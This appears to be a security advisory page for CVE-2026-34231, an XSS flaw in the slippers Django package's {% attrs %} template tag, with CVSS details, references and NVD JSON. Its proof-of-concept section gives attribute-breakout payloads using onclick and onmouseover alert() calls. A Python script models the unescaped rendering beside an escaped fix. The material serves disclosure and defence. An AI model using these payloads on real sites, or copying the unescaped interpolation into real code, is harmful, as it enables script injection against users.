Security Vulnerability Report
CVE-2026-34231 CVSS 6.1 MEDIUM

Published: 2026-03-31 16:16:33
Last Modified: 2026-04-03 14:51:03

Description

Slippers is a UI component framework for Django. Prior to version 0.6.3, a Cross-Site Scripting (XSS) vulnerability exists in the {% attrs %} template tag of the slippers Django package. When a context variable containing untrusted data is passed to {% attrs %}, the value is interpolated into an HTML attribute string without escaping, allowing an attacker to break out of the attribute context and inject arbitrary HTML or JavaScript into the rendered page. This issue has been patched in version 0.6.3.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:django:slippers:*:*:*:*:*:*:*:* - VULNERABLE
Slippers <= 0.6.2 (all releases before the fix in 0.6.3)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2026-34231
# In a Django view, set a context variable holding the malicious payload:
#     context = {'user_input': 'id="btn" onclick="alert(\'XSS\')"'}
# In the Django template, pass that variable to the vulnerable slippers tag:
#     <button {% attrs user_input %}>Submit</button>
# Before 0.6.3 the value is copied into the attribute string verbatim, so the
# embedded double quotes close the attribute and the attacker's attributes
# land in the start tag; the page's original PoC gives the rendered HTML as:
#     <button id="btn" onclick="alert('XSS')">Submit</button>
# When a user clicks the button, the JavaScript alert executes.
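The stand-alone Python below is an added example, not code from the slippers project or from the advisory. It models the behaviour the description attributes to {% attrs %} before 0.6.3 (a context value copied into name="value" with no escaping) beside an escaped form, then tokenises the resulting start tag to show which attributes a browser would actually see. The function names, the constructed CONTEXT sample (the PoC payload plus a second value that breaks out of a legitimately named attribute) and the simplified attribute tokenizer are this example's own assumptions; it uses only the standard library, so it runs without Django or slippers installed.

```python
import html
import re

# Constructed sample context for this example (not taken from the advisory):
# the PoC payload above, plus a value that breaks out of a normally named
# attribute instead of supplying whole attributes of its own.
CONTEXT = {
    "user_input": 'id="btn" onclick="alert(\'XSS\')"',
    "id": 'x" onmouseover="alert(1)',
}


def render_attrs_vulnerable(context, *names):
    """Stand-in for the pre-0.6.3 behaviour the advisory describes: each
    requested context variable is dropped straight into name="value" with
    no escaping. This is a model written for this example, NOT slippers' code."""
    return " ".join(f'{name}="{context[name]}"' for name in names if name in context)


def render_attrs_fixed(context, *names):
    """Hardened form: escape the value for a double-quoted attribute context.
    html.escape(quote=True) rewrites " and ' as character references, so the
    value can no longer close the attribute it lives in."""
    return " ".join(
        f'{name}="{html.escape(str(context[name]), quote=True)}"'
        for name in names
        if name in context
    )


def render_button(renderer, *names):
    """Equivalent of the template  <button {% attrs ... %}>Submit</button>."""
    return f"<button {renderer(CONTEXT, *names)}>Submit</button>"


# name="value" pairs; a quoted value ends at the next double quote, which is
# exactly the tokenizer rule an injected " exploits.
_ATTR_RE = re.compile(r'([A-Za-z_:][-A-Za-z0-9_:.]*)="([^"]*)"')


def parse_attributes(tag_html):
    """Simplified HTML attribute tokenizer: returns {name: value} for the
    start tag in tag_html. Close enough to a browser to show which
    attributes the markup really carries after injection."""
    return dict(_ATTR_RE.findall(tag_html))


def has_event_handler(tag_html):
    """True if any attribute of the tag is an on* event handler, i.e. the
    injected value has turned into script execution."""
    return any(name.lower().startswith("on") for name in parse_attributes(tag_html))


if __name__ == "__main__":
    for label, renderer in (("vulnerable", render_attrs_vulnerable),
                            ("fixed", render_attrs_fixed)):
        for names in (("user_input",), ("id",)):
            out = render_button(renderer, *names)
            print(f"{label:10} {names}: {out}")
            print(f"{'':10} attributes={parse_attributes(out)} "
                  f"handler={has_event_handler(out)}")
```

Running it shows the vulnerable renderer producing a start tag whose tokenised attributes include onclick or onmouseover, while the escaped renderer yields a single attribute whose value still contains the quotes, now as &quot;, and no handler. The same check applies to any server-side template helper that builds attribute strings by hand: escape for the attribute context, not just for text nodes.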

References

https://github.com/mixxorz/slippers/commit/16cc4ef4fa8ad2f7aee30798f16c3e7b653423b2 (Patch)
https://github.com/mixxorz/slippers/releases/tag/0.6.3 (Release Notes)
https://github.com/mixxorz/slippers/security/advisories/GHSA-w7rv-gfp4-j9j3 (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34231", "sourceIdentifier": "[email protected]", "published": "2026-03-31T16:16:32.603", "lastModified": "2026-04-03T14:51:03.493", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Slippers is a UI component framework for Django. Prior to version 0.6.3, a Cross-Site Scripting (XSS) vulnerability exists in the {% attrs %} template tag of the slippers Django package. When a context variable containing untrusted data is passed to {% attrs %}, the value is interpolated into an HTML attribute string without escaping, allowing an attacker to break out of the attribute context and inject arbitrary HTML or JavaScript into the rendered page. This issue has been patched in version 0.6.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:django:slippers:*:*:*:*:*:*:*:*", "versionEndIncluding": "0.6.2", "matchCriteriaId": "617012FB-61E8-4B1B-AECD-08D5488A558A"}]}]}], "references": [{"url": "https://github.com/mixxorz/slippers/commit/16cc4ef4fa8ad2f7aee30798f16c3e7b653423b2", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/mixxorz/slippers/releases/tag/0.6.3", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/mixxorz/slippers/security/advisories/GHSA-w7rv-gfp4-j9j3", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}